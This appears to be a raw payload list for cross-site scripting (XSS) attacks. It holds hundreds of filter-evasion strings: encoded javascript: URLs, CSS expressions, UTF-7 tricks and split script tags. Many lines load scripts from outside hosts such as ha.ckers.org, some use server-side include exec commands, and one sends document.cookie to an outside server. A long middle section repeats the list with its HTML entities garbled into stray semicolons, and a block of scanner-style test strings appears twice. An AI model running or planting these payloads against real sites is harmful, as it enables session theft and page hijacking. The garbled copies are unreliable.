<TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
';alert(String.fromCharCode(88,83,83))//\
';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\
";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image:
url(javascript:alert('XSS'))">
<DIV STYLE="background-image:
url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE>li {list-style-image:
url("javascript:alert('XSS')");}</STYLE><UL><LI>X
SS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&qu
ot;>
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
<OBJECT TYPE="text/x-scriptlet"
DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf"
AllowScriptAccess="always"></EMBED>
a="get";&#10;b="URL("";&#10;c="javascript:"
;;&#10;d="alert('XSS');")"; eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-
image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE
type="text/css">BODY{background:url("javascript:alert('XSS&apo
s;)")}</STYLE>
<LINK REL="stylesheet"
HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link"
Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/
xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD
BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><!
[CDATA[cript:alert('XSS');">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- --
>cript:alert('XSS')"></B></I></XML>
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<!--[if gte IE 4]>
<META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec
cmd="/bin/echo
'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<BR SIZE="&{alert('XSS')}">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&
;#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&a
mp;#39;&#88;&#83;&#83;&#39;&#41;>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&am
p;#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000
108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&
;#0000083&#0000083&#0000039&#0000041>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70
&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&
;#x58&#x53&#x53&#x27&#x29>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;
charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG
SRC
=
"
j
a
v
a
s
c
r&
#x0D;i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
perl -e 'print "<IMG SRC=java\
0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\
0IPT>";' > out
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG
"""><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
<SCRIPT a=">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" ''
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</
A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/
'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<script>document.vulnerable=true;</script>
<img SRC="jav ascript:document.vulnerable=true;">
<img SRC="javascript:document.vulnerable=true;">
<img SRC="  javascript:document.vulnerable=true;">
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script <B>document.vulnerable=true;</script>
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
<script>a=/XSS/\ndocument.vulnerable=true;</script>
\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<body BACKGROUND="javascript:document.vulnerable=true;">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC="javascript:document.vulnerable=true;">
<img LOWSRC="javascript:document.vulnerable=true;">
<bgsound SRC="javascript:document.vulnerable=true;">
<br SIZE="&{document.vulnerable=true}">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<style>li {list-style-image:
url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
<meta HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:document.vulnerable=true;">
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
<table BACKGROUND="javascript:document.vulnerable=true;">
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="width: expression(document.vulnerable=true);">
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE="text/javascript">document.vulnerable=true;</style>
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A
CLASS=XSS></a>
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</
style>
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
<base HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG
SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I
DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID="xss"><I><B><IMG SRC="javas<!--
-->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></span>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<div onmouseover="document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<iframe src="vbscript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<body onload="document.vulnerable=true;">
<div style="background-image: url(javascript:document.vulnerable=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable=true;);">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style><!--</style><script>document.vulnerable=true;//--></script>
<<script>document.vulnerable=true;</script>
<![<!--]]<script>document.vulnerable=true;//--></script>
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>;
REL=stylesheet">
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</
style>
<OBJECT TYPE="text/x-scriptlet"
DATA="http://www.securitycompass.com/scriptlet.html"></object>
<HTML xmlns:xss><?import namespace="xss"
implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT
SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
<script>document.write("<SCRI");</SCRIPT>PT
SRC="http://www.securitycompass.com/xss.js"></script>
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
</script><script>alert(1)</script>
</br style=a:expression(alert())>
<scrscriptipt>alert(1)</scrscriptipt>
<br size=\"&{alert('XSS')}\">
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\
";' > out
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\
";' > out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?
sid="%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";
;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//--
>;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
';';;!--";<;XSS>;=&;{()}
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
<;BASE HREF=";javascript:alert(';XSS';);//";>;
<;BGSOUND SRC=";javascript:alert(';XSS';);";>;
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
<;BODY ONLOAD=alert(';XSS';)>;
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
<;DIV STYLE=";width: expression(alert(';XSS';));";>;
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=javascript:alert(';XSS';)>;
<;IMG DYNSRC=";javascript:alert(';XSS';);";>;
<;IMG LOWSRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode";>;
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
<;STYLE>;li {list-style-image:
url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS
<;IMG SRC=';vbscript:msgbox(";XSS";)';>;
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
<;IMG SRC=";livescript:[code]";>;
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
<;META HTTP-EQUIV=";refresh";
CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;
URL=http://;URL=javascript:alert(';XSS';);";>;
<;IMG SRC=";mocha:[code]";>;
<;OBJECT TYPE=";text/x-scriptlet";
DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url
value=javascript:alert(';XSS';)>;<;/OBJECT>;
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&
#10;eval(a+b+c+d);
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
<;XSS STYLE=";xss:expression(alert(';XSS';))";>;
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A
CLASS=XSS>;<;/A>;
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/
STYLE>;
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;;
REL=stylesheet";>;
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
<;HTML xmlns:xss>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;!
[CDATA[cript:alert(';XSS';);";>;]]>;
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!--
-->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
<;HTML>;<;BODY>;
<;!--[if gte IE 4]>;
<;META HTTP-EQUIV=";Set-Cookie";
Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo
';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
<;? echo(';<;SCR)';;
<;BR SIZE=";&;{alert(';XSS';)}";>;
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
<;IMG
RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#
108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
<;IMG
RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;
#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000
040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
<;IMG
SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#
x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>;
<;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
\";;alert(';XSS';);//
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
<;IMG SRC=";jav	ascript:alert(';XSS';);";>;
<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
<;IMG
SRC
=
";
j
a
v
a
s
c
r
i

p
t
:
a
l
e
r
t

';
X
S&
#x0D;S
';
)
";
>;
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
<;SCRIPT SRC=http://ha.ckers.org/xss.js
<;SCRIPT SRC=//ha.ckers.org/.j>;
<;IMG SRC=";javascript:alert(';XSS';)";
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
<;SCRIPT>;a=/XSS/
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT
SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
<;A HREF=";http://1113982867/";>;XSS<;/A>;
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
<;A HREF=";//www.google.com/";>;XSS<;/A>;
<;A HREF=";//google";>;XSS<;/A>;
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
<;A HREF=";http://google.com/";>;XSS<;/A>;
<;A HREF=";http://www.google.com./";>;XSS<;/A>;
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
<script>document.vulnerable=true;</script>
<img SRC="jav ascript:document.vulnerable=true;">
<img SRC="javascript:document.vulnerable=true;">
<img SRC="  javascript:document.vulnerable=true;">
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script <B>document.vulnerable=true;</script>
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
<script>a=/XSS/\ndocument.vulnerable=true;</script>
\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<body BACKGROUND="javascript:document.vulnerable=true;">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC="javascript:document.vulnerable=true;">
<img LOWSRC="javascript:document.vulnerable=true;">
<bgsound SRC="javascript:document.vulnerable=true;">
<br SIZE="&{document.vulnerable=true}">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<style>li {list-style-image:
url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
<meta HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:document.vulnerable=true;">
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
<table BACKGROUND="javascript:document.vulnerable=true;">
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="width: expression(document.vulnerable=true);">
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE="text/javascript">document.vulnerable=true;</style>
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A
CLASS=XSS></a>
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</
style>
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
<base HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG
SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I
DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID="xss"><I><B><IMG SRC="javas<!--
-->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></span>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<div onmouseover="document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<iframe src="vbscript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
